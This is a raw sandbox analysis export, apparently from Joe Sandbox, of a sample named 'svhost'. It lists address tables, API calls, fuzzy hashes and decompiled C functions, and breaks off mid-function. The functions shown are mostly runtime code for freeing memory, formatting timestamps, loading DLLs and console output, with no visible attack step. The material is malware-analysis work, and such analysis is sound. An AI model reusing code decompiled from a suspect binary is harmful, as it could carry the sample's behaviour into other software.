                                      0x00eaef82
                                      0x00000000
                                      0x00eaef84
                                      0x00eaef84
                                      0x00eaef8a
                                      0x00eaef8a
                                      0x00eaef82
                                      0x00eaefa1
                                      0x00eaefa8
                                      0x00eaefab
                                      0x00eaf0cb
                                      0x00eaf0ce
                                      0x00eaf0db
                                      0x00eaf0de
                                      0x00eaf0e6
                                      0x00eaf0e6
                                      0x00eaf0d0
                                      0x00eaf0d6
                                      0x00eaf0d6
                                      0x00eaefb1
                                      0x00eaefb1
                                      0x00eaefb7
                                      0x00eaefbf
                                      0x00eaefc1
                                      0x00eaefc4
                                      0x00eaefcd
                                      0x00eaefd6
                                      0x00eaefdc
                                      0x00eaefdf
                                      0x00eaefe1
                                      0x00000000
                                      0x00000000
                                      0x00eaefe3
                                      0x00eaefe9
                                      0x00eaefea
                                      0x00eaeff5
                                      0x00eaeffd
                                      0x00eaf005
                                      0x00eaf008
                                      0x00eaf00b
                                      0x00eaf011
                                      0x00eaf017
                                      0x00eaf01d
                                      0x00eaf023
                                      0x00eaf026
                                      0x00000000
                                      0x00000000
                                      0x00eaf028
                                      0x00eaf04d
                                      0x00eaf04d
                                      0x00eaf050
                                      0x00eaf06d
                                      0x00eaf072
                                      0x00eaf075
                                      0x00eaf077
                                      0x00eaf0b5
                                      0x00eaf079
                                      0x00eaf079
                                      0x00eaf07f
                                      0x00eaf084
                                      0x00eaf08c
                                      0x00eaf08d
                                      0x00eaf08d
                                      0x00eaf0a4
                                      0x00eaf0ab
                                      0x00eaf0ae
                                      0x00eaf0b0
                                      0x00eaf0b0
                                      0x00eaf0bb
                                      0x00eaf0c1
                                      0x00eaf0c1
                                      0x00eaf0c6
                                      0x00000000
                                      0x00eaf0c6
                                      0x00eaf02a
                                      0x00eaf02c
                                      0x00eaf031
                                      0x00eaf037
                                      0x00eaf040
                                      0x00eaf049
                                      0x00eaf049
                                      0x00000000
                                      0x00eaf02c
                                      0x00eaf0e9
                                      0x00eaf0e9
                                      0x00eaf0ed
                                      0x00eaf0f5
                                      0x00eaf0fb
                                      0x00eaf0fe
                                      0x00eaf104
                                      0x00eaf106
                                      0x00eaf152
                                      0x00eaf158
                                      0x00eaf15f
                                      0x00eaf15f
                                      0x00eaf165
                                      0x00eaf169
                                      0x00000000
                                      0x00eaf16b
                                      0x00eaf16f
                                      0x00eaf178
                                      0x00eaf184
                                      0x00eaf192
                                      0x00eaf198
                                      0x00eaf19b
                                      0x00eaf19b
                                      0x00eaf169
                                      0x00eaf1aa
                                      0x00eaf1b2
                                      0x00eaf1bb
                                      0x00eaf108
                                      0x00eaf10e
                                      0x00eaf118
                                      0x00eaf12a
                                      0x00eaf131
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf106
                                      0x00eaef61
                                      0x00eaeed9
                                      0x00eaf143
                                      0x00eaf146
                                      0x00eaf147
                                      0x00eaf14a
                                      0x00eaf151
                                      0x00eaf151
                                      0x00000000
                                      0x00eaeed7
                                      0x00eaeed0
                                      0x00eaeed2
                                      0x00eaeed2
                                      0x00000000
                                      0x00eaeed2
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • _free.LIBCMT ref: 00EAF118
                                      • _free.LIBCMT ref: 00EAF131
                                      • _free.LIBCMT ref: 00EAF16F
                                      • _free.LIBCMT ref: 00EAF178
                                      • _free.LIBCMT ref: 00EAF184
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast
                                      • String ID: C
                                      • API String ID: 3291180501-1037565863
                                      • Opcode ID: 8619bd7c37d2fa57bc4898d55e450b58da3f2351a407c573d9701cd6ff948bfa
                                      • Instruction ID: e4c06237cc0d163ba14028c077a64736190c68b6b8ee84b6f3cf7a07d81f113c
                                      • Opcode Fuzzy Hash: 8619bd7c37d2fa57bc4898d55e450b58da3f2351a407c573d9701cd6ff948bfa
                                      • Instruction Fuzzy Hash: E8B12775A012199FDB24DF28C894AAEB7B5FF59304F1095EAE809AB351D731BE80CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E00E70610(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				char _v52;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				char _v88;
                                      				char _v89;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				char _v104;
                                      				char _v108;
                                      				char _v132;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				void* _t47;
                                      				void* _t56;
                                      				intOrPtr* _t57;
                                      				void* _t69;
                                      				intOrPtr _t73;
                                      				void* _t94;
                                      				void* _t95;
                                      				signed int _t96;
                                      
                                      				_t95 = __esi;
                                      				_t94 = __edi;
                                      				_t69 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1990);
                                      				_push( *[fs:0x0]);
                                      				_t40 =  *0xeef074; // 0x221cac15
                                      				_t41 = _t40 ^ _t96;
                                      				_v20 = _t41;
                                      				_push(_t41);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v100 = __ecx;
                                      				asm("xorps xmm0, xmm0");
                                      				asm("movlpd [ebp-0x18], xmm0");
                                      				E00E6F2A0( &_v28);
                                      				E00E6F2C0( &_v88,  &_v28);
                                      				if(_v84 != 0x3b) {
                                      					_t73 = _v84 + _a8;
                                      					__eflags = _t73;
                                      					_v84 = _t73;
                                      				} else {
                                      					_t106 = _v80 - 0x17;
                                      					if(_v80 >= 0x17) {
                                      						_v80 = 0;
                                      					} else {
                                      						_v80 = _v80 + 1;
                                      					}
                                      					_v84 = 0;
                                      				}
                                      				E00E66310(_t69,  &_v52, _t94, _t95, _t106, 0x104, 0);
                                      				_t92 =  &_v88;
                                      				_t47 = E00E57A20( &_v52);
                                      				_v96 = E00EA5509(E00E634C0( &_v52, 0), _t47, "%Y-%m-%dT%H:%M:%S",  &_v88);
                                      				_t107 = _v96;
                                      				if(_v96 <= 0) {
                                      					E00E57CD0(_t69, _a4, _t94, _t95, __eflags, 0xee4e10);
                                      					E00E57F50( &_v52);
                                      				} else {
                                      					asm("lfence");
                                      					E00E66280(_t69,  &_v52, _t94, _t95, _v96, 0);
                                      					_t56 = E00E51100( &_v89);
                                      					_t57 = E00E707D0( &_v104,  &_v52);
                                      					_t92 =  &_v108;
                                      					E00E57BA0(_a4, E00E51650(E00E707F0(_t69,  &_v132, _t94, _t95, _t107,  *((intOrPtr*)(E00E707B0( &_v108,  &_v52))),  *_t57, _t56)));
                                      					E00E57B40( &_v132);
                                      					E00E57F50( &_v52);
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t69, _v20 ^ _t96, _t92, _t94, _t95);
                                      			}


                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$_strftime
                                      • String ID: %Y-%m-%dT%H:%M:%S$;
                                      • API String ID: 517022210-3532145019
                                      • Opcode ID: 3367413891d44516f70661807741676cb2b2b77425451e247dd7fb4b485115f4
                                      • Instruction ID: ba581bf47c66a41def84177ca482f968006f561a71adefb0228068912b303be8
                                      • Opcode Fuzzy Hash: 3367413891d44516f70661807741676cb2b2b77425451e247dd7fb4b485115f4
                                      • Instruction Fuzzy Hash: F9410EB1D10208ABCB04EBD4DC92FEEB7B4BF54704F409529F5167B291EB706618CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: !$!
                                      • API String ID: 1333004437-1572258622
                                      • Opcode ID: 3435617c62f624a531917cb7ecc740559894b0846dd478e0419a87ca89011808
                                      • Instruction ID: 603d7702db0e9e5075324d3097ac5a871121b38e75b495062b0a5e1fa1aab87a
                                      • Opcode Fuzzy Hash: 3435617c62f624a531917cb7ecc740559894b0846dd478e0419a87ca89011808
                                      • Instruction Fuzzy Hash: 9831A774D002099FCB04DF98D5919DEBBF1AF88341F14D56AE816BB351EB31AA05CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB1325(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                      				signed int* _v8;
                                      				void** _t12;
                                      				void* _t16;
                                      				void* _t18;
                                      				signed int _t22;
                                      				WCHAR* _t23;
                                      				void** _t26;
                                      				signed int* _t29;
                                      				void* _t32;
                                      				void* _t34;
                                      
                                      				_t29 = _a4;
                                      				while(_t29 != _a8) {
                                      					_t22 =  *_t29;
                                      					_t12 = 0xef3660 + _t22 * 4;
                                      					_t32 =  *_t12;
                                      					_v8 = _t12;
                                      					if(_t32 == 0) {
                                      						_t23 =  *(0xecb0a8 + _t22 * 4);
                                      						_t32 = LoadLibraryExW(_t23, 0, 0x800);
                                      						if(_t32 != 0) {
                                      							L12:
                                      							_t26 = _v8;
                                      							 *_t26 = _t32;
                                      							if( *_t26 != 0) {
                                      								FreeLibrary(_t32);
                                      							}
                                      							L14:
                                      							if(_t32 != 0) {
                                      								_t16 = _t32;
                                      								L18:
                                      								return _t16;
                                      							}
                                      							L15:
                                      							_t29 =  &(_t29[1]);
                                      							continue;
                                      						}
                                      						_t18 = GetLastError();
                                      						if(_t18 != 0x57) {
                                      							L9:
                                      							_t32 = 0;
                                      							L10:
                                      							if(_t32 != 0) {
                                      								goto L12;
                                      							}
                                      							 *_v8 = _t18 | 0xffffffff;
                                      							goto L15;
                                      						}
                                      						_t18 = E00EB0488(_t23, L"api-ms-", 7);
                                      						_t34 = _t34 + 0xc;
                                      						if(_t18 == 0) {
                                      							goto L9;
                                      						}
                                      						_t18 = E00EB0488(_t23, L"ext-ms-", 7);
                                      						_t34 = _t34 + 0xc;
                                      						if(_t18 == 0) {
                                      							goto L9;
                                      						}
                                      						_t18 = LoadLibraryExW(_t23, _t32, _t32);
                                      						_t32 = _t18;
                                      						goto L10;
                                      					}
                                      					if(_t32 == 0xffffffff) {
                                      						goto L15;
                                      					}
                                      					goto L14;
                                      				}
                                      				_t16 = 0;
                                      				goto L18;
                                      			}


                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: e5ede770d697496429cea89e73abc2d54e7bdf37387314a956de6dd476e21c2c
                                      • Instruction ID: 18ac6d89bb581a8d93408df838fb9d90d0dd411416ee12d486c542dfdffb27d2
                                      • Opcode Fuzzy Hash: e5ede770d697496429cea89e73abc2d54e7bdf37387314a956de6dd476e21c2c
                                      • Instruction Fuzzy Hash: 9F210572A04320EFCB218B269C51EEF37D89B01774F6621A0E811B76E0F671ED0186E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB821C(intOrPtr _a4) {
                                      				void* _t18;
                                      
                                      				_t45 = _a4;
                                      				if(_a4 != 0) {
                                      					E00EB7F68(_t45, 7);
                                      					E00EB7F68(_t45 + 0x1c, 7);
                                      					E00EB7F68(_t45 + 0x38, 0xc);
                                      					E00EB7F68(_t45 + 0x68, 0xc);
                                      					E00EB7F68(_t45 + 0x98, 2);
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0xa0)));
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0xa4)));
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0xa8)));
                                      					E00EB7F68(_t45 + 0xb4, 7);
                                      					E00EB7F68(_t45 + 0xd0, 7);
                                      					E00EB7F68(_t45 + 0xec, 0xc);
                                      					E00EB7F68(_t45 + 0x11c, 0xc);
                                      					E00EB7F68(_t45 + 0x14c, 2);
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0x154)));
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0x158)));
                                      					E00EB051F( *((intOrPtr*)(_t45 + 0x15c)));
                                      					return E00EB051F( *((intOrPtr*)(_t45 + 0x160)));
                                      				}
                                      				return _t18;
                                      			}

                                      APIs
                                        • Part of subcall function 00EB7F68: _free.LIBCMT ref: 00EB7F8D
                                      • _free.LIBCMT ref: 00EB826A
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB8275
                                      • _free.LIBCMT ref: 00EB8280
                                      • _free.LIBCMT ref: 00EB82D4
                                      • _free.LIBCMT ref: 00EB82DF
                                      • _free.LIBCMT ref: 00EB82EA
                                      • _free.LIBCMT ref: 00EB82F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a6ad70abe4311e6f8f727da59bf6d8b5c616b0ec9788bcd32628e3c1026de0e9
                                      • Instruction ID: bb79bc42df0698306e196b848ec8927866afaa3a675fa0e8476c5f43c27ed213
                                      • Opcode Fuzzy Hash: a6ad70abe4311e6f8f727da59bf6d8b5c616b0ec9788bcd32628e3c1026de0e9
                                      • Instruction Fuzzy Hash: 13114F71689B08AAD930B7B0CC07FDBB7DD5F40700F401C29B2D976A92DA65F905CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00EBA143(void* __eflags, void* _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
                                      				signed int _v8;
                                      				char _v16;
                                      				char _v23;
                                      				char _v24;
                                      				void _v32;
                                      				signed int _v33;
                                      				long _v40;
                                      				signed char _v44;
                                      				char _v47;
                                      				void _v48;
                                      				intOrPtr _v52;
                                      				long _v56;
                                      				char _v60;
                                      				intOrPtr _v68;
                                      				char _v72;
                                      				struct _OVERLAPPED* _v76;
                                      				signed char _v80;
                                      				signed char _v84;
                                      				intOrPtr _v88;
                                      				signed int _v92;
                                      				long _v96;
                                      				long _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				signed char _v112;
                                      				void* _v116;
                                      				char _v120;
                                      				int _v124;
                                      				intOrPtr _v128;
                                      				struct _OVERLAPPED* _v132;
                                      				struct _OVERLAPPED* _v136;
                                      				struct _OVERLAPPED* _v140;
                                      				struct _OVERLAPPED* _v144;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t172;
                                      				signed int _t174;
                                      				intOrPtr _t176;
                                      				int _t178;
                                      				intOrPtr _t183;
                                      				intOrPtr _t186;
                                      				void* _t188;
                                      				void* _t190;
                                      				long _t193;
                                      				void _t198;
                                      				long _t202;
                                      				void* _t206;
                                      				intOrPtr _t212;
                                      				signed char* _t213;
                                      				char _t216;
                                      				signed int _t219;
                                      				char* _t220;
                                      				void* _t222;
                                      				long _t228;
                                      				intOrPtr _t229;
                                      				char _t231;
                                      				signed char _t235;
                                      				struct _OVERLAPPED* _t243;
                                      				void* _t244;
                                      				signed int _t247;
                                      				intOrPtr _t250;
                                      				signed char _t253;
                                      				signed int _t254;
                                      				signed char _t256;
                                      				struct _OVERLAPPED* _t257;
                                      				intOrPtr _t259;
                                      				void* _t263;
                                      				signed char _t264;
                                      				void* _t265;
                                      				void* _t267;
                                      				long _t270;
                                      				void* _t272;
                                      				signed int _t274;
                                      				long _t275;
                                      				struct _OVERLAPPED* _t276;
                                      				signed int _t278;
                                      				intOrPtr _t280;
                                      				void* _t282;
                                      				signed int _t283;
                                      				signed int _t286;
                                      				long _t287;
                                      				long _t288;
                                      				signed char _t289;
                                      				intOrPtr _t290;
                                      				signed int _t292;
                                      				signed int _t294;
                                      				void* _t295;
                                      				void* _t297;
                                      
                                      				_t292 = _t294;
                                      				_t295 = _t294 - 0x8c;
                                      				_t172 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t172 ^ _t292;
                                      				_t174 = _a8;
                                      				_t264 = _a12;
                                      				_t278 = (_t174 & 0x0000003f) * 0x38;
                                      				_t247 = _t174 >> 6;
                                      				_v112 = _t264;
                                      				_v84 = _t247;
                                      				_t176 =  *((intOrPtr*)(0xef3820 + _t247 * 4));
                                      				_v80 = _t278;
                                      				_t10 = _t176 + 0x18; // 0x28c183f0
                                      				_t280 = _a16 + _t264;
                                      				_v116 =  *((intOrPtr*)(_t278 + _t10));
                                      				_v104 = _t280;
                                      				_t178 = GetConsoleCP();
                                      				_t243 = 0;
                                      				_v124 = _t178;
                                      				E00EA49BF( &_v72, _t264, 0);
                                      				asm("stosd");
                                      				_t250 =  *((intOrPtr*)(_v68 + 8));
                                      				_v128 = _t250;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_t270 = _v112;
                                      				_v40 = _t270;
                                      				if(_t270 >= _t280) {
                                      					L53:
                                      					__eflags = _v60 - _t243;
                                      				} else {
                                      					_t283 = _v92;
                                      					while(1) {
                                      						_v47 =  *_t270;
                                      						_v76 = _t243;
                                      						_v44 = 1;
                                      						_t186 =  *((intOrPtr*)(0xef3820 + _v84 * 4));
                                      						_v52 = _t186;
                                      						if(_t250 != 0xfde9) {
                                      							goto L24;
                                      						}
                                      						_t264 = _v80;
                                      						_t212 = _t186 + 0x2e + _t264;
                                      						_t257 = _t243;
                                      						_v108 = _t212;
                                      						while( *((intOrPtr*)(_t212 + _t257)) != _t243) {
                                      							_t257 =  &(_t257->Internal);
                                      							if(_t257 < 5) {
                                      								continue;
                                      							}
                                      							break;
                                      						}
                                      						_t213 = _v40;
                                      						_t274 = _v104 - _t213;
                                      						_v44 = _t257;
                                      						if(_t257 <= 0) {
                                      							_t259 =  *((char*)(( *_t213 & 0x000000ff) + 0xeef960)) + 1;
                                      							_v52 = _t259;
                                      							__eflags = _t259 - _t274;
                                      							if(_t259 > _t274) {
                                      								__eflags = _t274;
                                      								if(_t274 <= 0) {
                                      									goto L45;
                                      								} else {
                                      									_t287 = _v40;
                                      									do {
                                      										_t265 = _t243 + _t264;
                                      										_t216 =  *((intOrPtr*)(_t243 + _t287));
                                      										_t243 =  &(_t243->Internal);
                                      										 *((char*)(_t265 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e)) = _t216;
                                      										_t264 = _v80;
                                      										__eflags = _t243 - _t274;
                                      									} while (_t243 < _t274);
                                      									goto L44;
                                      								}
                                      							} else {
                                      								_t275 = _v40;
                                      								__eflags = _t259 - 4;
                                      								_v144 = _t243;
                                      								_t261 =  &_v144;
                                      								_v140 = _t243;
                                      								_v56 = _t275;
                                      								_t219 = (0 | _t259 == 0x00000004) + 1;
                                      								__eflags = _t219;
                                      								_push( &_v144);
                                      								_v44 = _t219;
                                      								_push(_t219);
                                      								_t220 =  &_v56;
                                      								goto L22;
                                      							}
                                      						} else {
                                      							_t228 =  *((char*)(( *(_t264 + _v52 + 0x2e) & 0x000000ff) + 0xeef960)) + 1;
                                      							_v56 = _t228;
                                      							_t229 = _t228 - _t257;
                                      							_v52 = _t229;
                                      							if(_t229 > _t274) {
                                      								__eflags = _t274;
                                      								if(_t274 > 0) {
                                      									_t288 = _v40;
                                      									do {
                                      										_t267 = _t243 + _t264 + _t257;
                                      										_t231 =  *((intOrPtr*)(_t243 + _t288));
                                      										_t243 =  &(_t243->Internal);
                                      										 *((char*)(_t267 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e)) = _t231;
                                      										_t257 = _v44;
                                      										_t264 = _v80;
                                      										__eflags = _t243 - _t274;
                                      									} while (_t243 < _t274);
                                      									L44:
                                      									_t283 = _v92;
                                      								}
                                      								L45:
                                      								_t286 = _t283 + _t274;
                                      								__eflags = _t286;
                                      								L46:
                                      								__eflags = _v60;
                                      								_v92 = _t286;
                                      							} else {
                                      								_t264 = _t243;
                                      								if(_t257 > 0) {
                                      									_t290 = _v108;
                                      									do {
                                      										 *((char*)(_t292 + _t264 - 0xc)) =  *((intOrPtr*)(_t290 + _t264));
                                      										_t264 = _t264 + 1;
                                      									} while (_t264 < _t257);
                                      									_t229 = _v52;
                                      								}
                                      								_t275 = _v40;
                                      								if(_t229 > 0) {
                                      									E00EA0CF0( &_v16 + _t257, _t275, _v52);
                                      									_t257 = _v44;
                                      									_t295 = _t295 + 0xc;
                                      								}
                                      								if(_t257 > 0) {
                                      									_t264 = _v44;
                                      									_t276 = _t243;
                                      									_t289 = _v80;
                                      									do {
                                      										_t263 = _t276 + _t289;
                                      										_t276 =  &(_t276->Internal);
                                      										 *(_t263 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e) = _t243;
                                      									} while (_t276 < _t264);
                                      									_t275 = _v40;
                                      								}
                                      								_v136 = _t243;
                                      								_v120 =  &_v16;
                                      								_t261 =  &_v136;
                                      								_v132 = _t243;
                                      								_push( &_v136);
                                      								_t235 = (0 | _v56 == 0x00000004) + 1;
                                      								_v44 = _t235;
                                      								_push(_t235);
                                      								_t220 =  &_v120;
                                      								L22:
                                      								_push(_t220);
                                      								_push( &_v76);
                                      								_t222 = E00EBB153(_t261);
                                      								_t297 = _t295 + 0x10;
                                      								if(_t222 == 0xffffffff) {
                                      									goto L53;
                                      								} else {
                                      									_t270 = _t275 + _v52 - 1;
                                      									L32:
                                      									_t270 = _t270 + 1;
                                      									_v40 = _t270;
                                      									_t193 = E00EB2838(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
                                      									_t295 = _t297 + 0x20;
                                      									_v56 = _t193;
                                      									if(_t193 == 0) {
                                      										goto L53;
                                      									} else {
                                      										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
                                      											L52:
                                      											_v96 = GetLastError();
                                      											goto L53;
                                      										} else {
                                      											_t283 = _v88 - _v112 + _t270;
                                      											_v92 = _t283;
                                      											if(_v100 < _v56) {
                                      												goto L53;
                                      											} else {
                                      												if(_v47 != 0xa) {
                                      													L39:
                                      													if(_t270 >= _v104) {
                                      														goto L53;
                                      													} else {
                                      														_t250 = _v128;
                                      														continue;
                                      													}
                                      												} else {
                                      													_t198 = 0xd;
                                      													_v48 = _t198;
                                      													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
                                      														goto L52;
                                      													} else {
                                      														if(_v100 < 1) {
                                      															goto L53;
                                      														} else {
                                      															_v88 = _v88 + 1;
                                      															_t283 = _t283 + 1;
                                      															_v92 = _t283;
                                      															goto L39;
                                      														}
                                      													}
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      						goto L54;
                                      						L24:
                                      						_t253 = _v80;
                                      						_t264 =  *((intOrPtr*)(_t253 + _t186 + 0x2d));
                                      						__eflags = _t264 & 0x00000004;
                                      						if((_t264 & 0x00000004) == 0) {
                                      							_v33 =  *_t270;
                                      							_t188 = E00EAAFAD(_t264);
                                      							_t254 = _v33 & 0x000000ff;
                                      							__eflags =  *((intOrPtr*)(_t188 + _t254 * 2)) - _t243;
                                      							if( *((intOrPtr*)(_t188 + _t254 * 2)) >= _t243) {
                                      								_push(1);
                                      								_push(_t270);
                                      								goto L31;
                                      							} else {
                                      								_t202 = _t270 + 1;
                                      								_v56 = _t202;
                                      								__eflags = _t202 - _v104;
                                      								if(_t202 >= _v104) {
                                      									_t264 = _v84;
                                      									_t256 = _v80;
                                      									 *((char*)(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2e)) = _v33;
                                      									 *(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2d) =  *(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2d) | 0x00000004;
                                      									_t286 = _t283 + 1;
                                      									goto L46;
                                      								} else {
                                      									_t206 = E00EB3D67( &_v76, _t270, 2);
                                      									_t297 = _t295 + 0xc;
                                      									__eflags = _t206 - 0xffffffff;
                                      									if(_t206 == 0xffffffff) {
                                      										goto L53;
                                      									} else {
                                      										_t270 = _v56;
                                      										goto L32;
                                      									}
                                      								}
                                      							}
                                      						} else {
                                      							_t264 = _t264 & 0x000000fb;
                                      							_v24 =  *((intOrPtr*)(_t253 + _t186 + 0x2e));
                                      							_v23 =  *_t270;
                                      							_push(2);
                                      							 *(_t253 + _v52 + 0x2d) = _t264;
                                      							_push( &_v24);
                                      							L31:
                                      							_push( &_v76);
                                      							_t190 = E00EB3D67();
                                      							_t297 = _t295 + 0xc;
                                      							__eflags = _t190 - 0xffffffff;
                                      							if(_t190 == 0xffffffff) {
                                      								goto L53;
                                      							} else {
                                      								goto L32;
                                      							}
                                      						}
                                      						goto L54;
                                      					}
                                      				}
                                      				L54:
                                      				if(__eflags != 0) {
